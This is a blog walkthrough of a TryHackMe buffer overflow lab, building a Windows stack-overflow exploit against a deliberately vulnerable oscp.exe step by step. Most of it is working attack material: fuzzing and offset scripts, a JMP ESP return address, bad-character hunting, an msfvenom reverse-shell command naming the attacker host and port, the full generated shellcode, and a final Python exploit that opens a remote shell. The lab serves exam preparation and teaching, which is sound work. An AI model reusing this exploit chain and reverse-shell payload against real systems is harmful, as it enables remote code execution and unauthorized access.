Learn Buffer Overflow Techniques

Akbar KhanAkbar Khan
13 min read

Table of contents

There are a total of 10 labs, from OVERFLOW1 to OVERFLOW10. I'll guide you through the basic concepts so you can solve the other labs on your own.

About The Labs

This is an amazing room created by Tib3rius that includes everything you need if you are preparing for the OSCP and eCPPT certification exams.

I will try to make it as easy as possible. It might be a bit lengthy, but I will cover all the do's and don'ts.

Note: We will not use the TryHackMe guide, as I find it a little difficult for beginners.

Lab Requirements

  1. Windows 7 Machine (with Immunity Debugger installed)

  2. Kali Linux Machine

In these labs, we are using a TryHackMe machine that is pre-configured with the above requirements, so let's get started.

The command to connect to the machine and access the full screen is as follows:

xfreerdp /u:admin /p:password /cert:ignore /v:10.10.70.85 /workarea

Once connected, if prompted for network selection, choose Home Network.

Windows Victim Machine

As we can see, this machine has a vulnerable application and Immunity Debugger preconfigured. In the vulnerable folder, there is an executable named oscp that we are going to use. Let's find out what this oscp.exe does.

oscp.exe is listening on port 1337. From our attacker machine, we can try to connect using nc.

Run this command from the attacker's terminal.

nc 10.10.70.85 1337

What happened on the victim machine?

The example above shows the general case, which is the ideal functionality.

Test Case 1

From the attacker machine, we will try to send something much larger than test_akbar.

Where did this idea come from? Since we are working on the buffer overflow room, our goal is to overflow the buffer. This means we will send a large amount of data, which might cause the application to crash.

To send a large amount of data, I plan to use Python to generate A*1000 and then send it.

First, we sent 1000 A's, but the application was able to respond with OVERFLOW1 COMPLETED.

Now, we are increasing the number of A's from 1000 to 2000 to see what happens.

>>> print("A"*2000)

Now, check the application's response.

The application crashed, revealing a buffer overflow vulnerability.

In some cases, you might receive an error called a segmentation fault. This means you are trying to access a part of memory that you are not allowed to access.

oscp.exe crashed

Test Case 2

Now, we will write a Python script to automate this process. There are some scripts available in the TryHackMe room for crashing or controlling the EIP, but we won't be using those.

Below is script2.py. You can name the script as whatever you like.

#!/usr/bin/env python3

import socket
import sys

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 is bytes
    payload = [b"A" * 2000]  # as we are using python3 we need to mention the strings in bytes
    s.send(payload)
    s.close()

except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()

Let's run this script without starting oscp.exe to see if it's working correctly. We should get an error.

There is one issue in our script, and this is an intentional issue that you might encounter. We are directly sending our payload without using the valid command. In this lab, our command is:

So, we need to specify OVERFLOW1 in our script, followed by a space and our value, as shown below.

OVERFLOW1 [value]

Re-editing the script.

The part marked in bold was causing the problem

#!/usr/bin/env python3
import socket
import sys

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 is bytes
    payload = [b'OVERFLOW1 ' + b'A' * 2000]  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things so we will join this using a join function.
    s.send(payload)
    s.close()
except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()

Now, let's start oscp.exe and run the script.

Make sure oscp.exe is running before you execute the script.

Now check the application.

It crashed, which means our script is working perfectly.

SUPER COOL!

Test Case 3

Here, I am going to use Immunity Debugger because I need to check some registers and other details to get a reverse shell from this machine.

Let's start Immunity Debugger now.

Once open, you have two methods to find the executable: 1) to run the executable and attach it, 2) directly open the .exe file.

It is recommended to open the .exe file directly.

Once open it will be in paused state.

As show below we need to run this and it should be in running state.

Now we are running.

So what we are going to do is we will run our script2.py and see in my immunity debugger.

The application should crash and be the immunity debugger will be moved to Paused again.

Observe the CPU Registers

41414141 is the hexadecimal representation of the characters AAAAAAA.

The most important pointer to note below is EIP, which is overwritten as 414141.

This means that due to overflow, our AAAAA's are crossing EIP and entering ESP, as shown below.

So now, what we are interested in is gaining complete control over the EIP. EIP is the instruction pointer that will try to execute the next line of code.

Challenge here

We need to find the exact offset index of this EIP so that we can take full control of it. But our problem is that we sent 2000 A's, so there is no way to figure out exactly where the EIP starts—whether it's at 1500, 1600, 1700, or any value in between. We can't just assume it.

What we know is that we sent 2000 A's, and they are affecting the EIP. To solve this, we will use a cyclic pattern. The cyclic pattern will help us quickly determine the exact point where our A's are affecting the EIP.

We will create a pattern of 2000 characters. This pattern will pass over the EIP values, and by checking the EIP, we can identify the exact pattern where our EIP starts.

msf-pattern_create -l 2000

Now let's copy this pattern into our payload.

Remove A*2000 from script2.py and paste the pattern above.

#!/usr/bin/env python3

import socket
import sys

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 is bytes
    payload = [b'OVERFLOW1 ' + b'pattern']  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things so we will join this using a join function
    s.send(payload)
    s.close()
except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()

How it actually looks.

Save this, restart the Immunity Debugger, and run oscp.exe.

Then, run script2.py.

Again, the application will crash, but now we can identify the EIP value.

EIP 6F43396E is a unique number, and using this number, we can find the index/offset where it is getting overwritten on the EIP.

To find the pattern where the EIP is overwritten with the value 6F43396E, we will use another tool called msf-pattern-offset.

msf-pattern_offset -l 2000 -q 6F43396E

So now we have found the exact match. This indicates that the EIP starts at 1978. Whatever we write after 1978 will overwrite the EIP.

Re-edit script2.py

In the script below, the B character will overwrite the EIP.

#!/usr/bin/env python3

import socket
import sys

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 is bytes
    payload = [b'OVERFLOW1 ' + b'A' * 1978 + b'B' * 4]  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things so we will join this using a join function
    s.send(payload)
    s.close()
except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()

Save this, restart the Immunity Debugger, and run oscp.exe.

Run script2.py.

The application crashed.

Now, my EIP is overwritten to 42424242, which is the hexadecimal conversion of the character B.

Let see If we send something after B where it goes.

Re-edit script2.py

We have added C char 100 times.

#!/usr/bin/env python3

import socket
import sys

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 is bytes

    payload = [b'OVERFLOW1 ' + b'A' * 1978 + b'B' * 4 + b'C' * 100]  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things so we will join this using a join function.

    s.send(payload)
    s.close()

except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()

EIP contains 42424242, which represents the character B.

EAX contains our AAAAA.

In ESP, I have the C character. This is crucial to know because this is where I plan to insert malicious code.

Now we have control over ESP as well.

What if I make EIP jump or tell EIP to go to ESP? It will go to ESP, and if I replace the C character with my malicious shell code, EIP will execute that code.

That's the main goal we are working towards.

If you've followed along this far, congratulations!

Malicious Task

To perform the jumping task, we need to use a Python script called Mona.

Since we are using a TryHackMe machine, it is already installed in the Immunity Debugger.

But let's see where you can get it and where to place it.

GitHub — corelan/mona: Corelan Repository for mona.py

Download the mona.py script and move it to the Immunity Debugger's Python folder.

Move mona.py here.

to invoke mona

!mona

we are going to use this jump command to jump from EIP to ESP.

!mona jmp -r esp

Here, your Mona terminal will be activated again. Type !mona to check the status.

We have found a total of 9 pointers. You can choose any one of them, but I will choose the one that has all FALSE. We are using the first one: 0x625011af.

Now, the problem here is that whenever I use this address, I need to convert it to little-endian format.

Don't worry, we'll learn how.

My address was 0x625011af.

The easiest way is to reverse it and add \x before each pair of characters, as shown below.

\xaf\x11\x50\x62

Edit the script2.py and paste this little-endian value in place of B.

#!/usr/bin/env python3

import socket
import sys

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 bytes

    payload = [b'OVERFLOW1 ' + b'A' * 1978 + b'\xaf\x11\x50\x62' + b'C' * 100]  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things, so we will join this using the join function.

    s.send(payload)
    s.close()

except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()

The reason we're doing this is that this is the jump address, and I want to jump to this address and enter the C buffer where I'll upload the malicious code.

We will also set a breakpoint. I'm setting this so that whenever the value 0x625011af appears, it stops right there.

Click on the assemble and disassemble box and press CTRL+G.

The ESP jmp instruction is set to FFE4

Now our breakpoint is set.

Run script2.py

Check the Immunity Debugger.

Now the EIP is set to 625011AF, which is the jump instruction. The jump is over ESP, and now we will create malicious code and paste it in 'C'.

There is one major character issue that you will encounter, which I will explain further.

Let's create a malicious payload.

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.48.237 LPORT=2306 -f py

We get shellcode that provides a buf variable. All of this is in bytes, but the problem is that the shellcode contains some bad characters that are not allowed in the vulnerable program.

If any bad character is used, we will not get a reverse shell.

Find Bad Characters

Identify the bad characters and remove them from our payload.

Search online to find out what bad characters are.

https://github.com/cytopia/badchars

copy this bad char in our script2.py but before running pad b as they are not in bytes.

badchars=(
 “\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10””\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"”\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"”\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"”\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"”\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"”\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"”\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"”\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"”\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"”\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"”\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"”\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"”\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"”\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"”\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff”)

Paste the above characters in script.

#!/usr/bin/env python3

import socket
import sys

badchars = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)  # This will find bad characters

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 bytes

    payload = [b'OVERFLOW1 ' + b'A' * 1978 + b'\xaf\x11\x50\x62' + badchars]  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things, so we will join this using the join function.

    s.send(payload)
    s.close()

except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()

Run the script2.py

Check immunity debugger.

Follow in dump

Now we need to check the hex dump and find the bad characters.

As highlighted below, the actual sequence is 05 06, so it should be 07 08, but it is 0A and 0D.

Therefore, 07 and 08 are bad characters.

Again found

2C 2D, ideally it should be 2E 2F, but it's 0A, which means

2E and 2F are bad characters.

We found these many bad characters.

\x07\x08\x2e\x2f\xa0\xa1\x00

Now Again generate the payload excluding this bad characters.

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.48.237 LPORT=2306 -f py -b “\x07\x08\x2e\x2f\xa0\xa1\x00”

New Payload which doesn’t have the bad characters.

Remove the bad characters and paste this in script2.py

buf = b""
buf += b"\x2b\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e"
buf += b"\x81\x76\x0e\x6e\x97\x03\xdf\x83\xee\xfc\xe2\xf4"
buf += b"\x92\x7f\x81\xdf\x6e\x97\x63\x56\x8b\xa6\xc3\xbb"
buf += b"\xe5\xc7\x33\x54\x3c\x9b\x88\x8d\x7a\x1c\x71\xf7"
buf += b"\x61\x20\x49\xf9\x5f\x68\xaf\xe3\x0f\xeb\x01\xf3"
buf += b"\x4e\x56\xcc\xd2\x6f\x50\xe1\x2d\x3c\xc0\x88\x8d"
buf += b"\x7e\x1c\x49\xe3\xe5\xdb\x12\xa7\x8d\xdf\x02\x0e"
buf += b"\x3f\x1c\x5a\xff\x6f\x44\x88\x96\x76\x74\x39\x96"
buf += b"\xe5\xa3\x88\xde\xb8\xa6\xfc\x73\xaf\x58\x0e\xde"
buf += b"\xa9\xaf\xe3\xaa\x98\x94\x7e\x27\x55\xea\x27\xaa"
buf += b"\x8a\xcf\x88\x87\x4a\x96\xd0\xb9\xe5\x9b\x48\x54"
buf += b"\x36\x8b\x02\x0c\xe5\x93\x88\xde\xbe\x1e\x47\xfb"
buf += b"\x4a\xcc\x58\xbe\x37\xcd\x52\x20\x8e\xc8\x5c\x85"
buf += b"\xe5\x85\xe8\x52\x33\xff\x30\xed\x6e\x97\x6b\xa8"
buf += b"\x1d\xa5\x5c\x8b\x06\xdb\x74\xf9\x69\x68\xd6\x67"
buf += b"\xfe\x96\x03\xdf\x47\x53\x57\x8f\x06\xbe\x83\xb4"
buf += b"\x6e\x68\xd6\x8f\x3e\xc7\x53\x9f\x3e\xd7\x53\xb7"
buf += b"\x84\x98\xdc\x3f\x91\x42\x94\xb5\x6b\xff\x09\xd4"
buf += b"\x5e\x7a\x6b\xdd\x6e\x9e\x01\x56\x88\xfd\x13\x89"
buf += b"\x39\xff\x9a\x7a\x1a\xf6\xfc\x0a\xeb\x57\x77\xd3"
buf += b"\x91\xd9\x0b\xaa\x82\xff\xf3\x6a\xcc\xc1\xfc\x0a"
buf += b"\x06\xf4\x6e\xbb\x6e\x1e\xe0\x88\x39\xc0\x32\x29"
buf += b"\x04\x85\x5a\x89\x8c\x6a\x65\x18\x2a\xb3\x3f\xde"
buf += b"\x6f\x1a\x47\xfb\x7e\x51\x03\x9b\x3a\xc7\x55\x89"
buf += b"\x38\xd1\x55\x91\x38\xc1\x50\x89\x06\xee\xcf\xe0"
buf += b"\xe8\x68\xd6\x56\x8e\xd9\x55\x99\x91\xa7\x6b\xd7"
buf += b"\xe9\x8a\x63\x20\xbb\x2c\xf3\x6a\xcc\xc1\x6b\x79"
buf += b"\xfb\x2a\x9e\x20\xbb\xab\x05\xa3\x64\x17\xf8\x3f"
buf += b"\x1b\x92\xb8\x98\x7d\xe5\x6c\xb5\x6e\xc4\xfc\x0a"

Now the script is

#!/usr/bin/env python3

import socket
import sys

# Bad characters
buf = b""

buf += b"\x2b\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e"
buf += b"\x81\x76\x0e\x6e\x97\x03\xdf\x83\xee\xfc\xe2\xf4"
buf += b"\x92\x7f\x81\xdf\x6e\x97\x63\x56\x8b\xa6\xc3\xbb"
buf += b"\xe5\xc7\x33\x54\x3c\x9b\x88\x8d\x7a\x1c\x71\xf7"
buf += b"\x61\x20\x49\xf9\x5f\x68\xaf\xe3\x0f\xeb\x01\xf3"
buf += b"\x4e\x56\xcc\xd2\x6f\x50\xe1\x2d\x3c\xc0\x88\x8d"
buf += b"\x7e\x1c\x49\xe3\xe5\xdb\x12\xa7\x8d\xdf\x02\x0e"
buf += b"\x3f\x1c\x5a\xff\x6f\x44\x88\x96\x76\x74\x39\x96"
buf += b"\xe5\xa3\x88\xde\xb8\xa6\xfc\x73\xaf\x58\x0e\xde"
buf += b"\xa9\xaf\xe3\xaa\x98\x94\x7e\x27\x55\xea\x27\xaa"
buf += b"\x8a\xcf\x88\x87\x4a\x96\xd0\xb9\xe5\x9b\x48\x54"
buf += b"\x36\x8b\x02\x0c\xe5\x93\x88\xde\xbe\x1e\x47\xfb"
buf += b"\x4a\xcc\x58\xbe\x37\xcd\x52\x20\x8e\xc8\x5c\x85"
buf += b"\xe5\x85\xe8\x52\x33\xff\x30\xed\x6e\x97\x6b\xa8"
buf += b"\x1d\xa5\x5c\x8b\x06\xdb\x74\xf9\x69\x68\xd6\x67"
buf += b"\xfe\x96\x03\xdf\x47\x53\x57\x8f\x06\xbe\x83\xb4"
buf += b"\x6e\x68\xd6\x8f\x3e\xc7\x53\x9f\x3e\xd7\x53\xb7"
buf += b"\x84\x98\xdc\x3f\x91\x42\x94\xb5\x6b\xff\x09\xd4"
buf += b"\x5e\x7a\x6b\xdd\x6e\x9e\x01\x56\x88\xfd\x13\x89"
buf += b"\x39\xff\x9a\x7a\x1a\xf6\xfc\x0a\xeb\x57\x77\xd3"
buf += b"\x91\xd9\x0b\xaa\x82\xff\xf3\x6a\xcc\xc1\xfc\x0a"
buf += b"\x06\xf4\x6e\xbb\x6e\x1e\xe0\x88\x39\xc0\x32\x29"
buf += b"\x04\x85\x5a\x89\x8c\x6a\x65\x18\x2a\xb3\x3f\xde"
buf += b"\x6f\x1a\x47\xfb\x7e\x51\x03\x9b\x3a\xc7\x55\x89"
buf += b"\x38\xd1\x55\x91\x38\xc1\x50\x89\x06\xee\xcf\xe0"
buf += b"\xe8\x68\xd6\x56\x8e\xd9\x55\x99\x91\xa7\x6b\xd7"
buf += b"\xe9\x8a\x63\x20\xbb\x2c\xf3\x6a\xcc\xc1\x6b\x79"
buf += b"\xfb\x2a\x9e\x20\xbb\xab\x05\xa3\x64\x17\xf8\x3f"
buf += b"\x1b\x92\xb8\x98\x7d\xe5\x6c\xb5\x6e\xc4\xfc\x0a"

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 bytes

    # Payload including padding (NOP sled) and the buffer of bad characters
    payload = [b'OVERFLOW1 ' + b'A' * 1978 + b'\xaf\x11\x50\x62' + b'\x90' * 16 + buf]  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things, so we will join this using the join function.

    s.send(payload)
    s.close()

except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()

One last thing we need to add is a NOP sled \x90. It is placed between the jump and the payload. We need some space between the jump and the payload to get the reverse shell, so we add \x90 for padding.

Now, we don't need the immunity debugger. I found my bad character and my jump address, so I will run the program and execute our script.

Running oscp.exe.

Listener in place.

Run the script2.py for the last time.

BOOOOMMMMMMM!!!!!!!!!!!!!!!!!!!!!!!!

And we got the shell.

Thank you for reading this blog. While attempting this challenge, I learned many things. This was a unique target with a unique vulnerability.

0
Subscribe to my newsletter

Read articles from Akbar Khan directly inside your inbox. Subscribe to the newsletter, and don't miss out.

offsecredteamingSecurityBuffer OverfowbreachforcetryhackmeWindows

Written by

Akbar Khan
Akbar Khan

Experienced Information Technology Professional | eLearn Security Certified Professional Penetration Tester (eCPPTv2) With 5 years of hands-on experience in the Information Technology and cybersecurity domains, I have developed a comprehensive skill set in Linux, Windows OS / Windows Server, and ethical hacking. My expertise extends to system security fundamentals such as Public Key Infrastructure (PKI), cryptography, and encryption/decryption algorithms.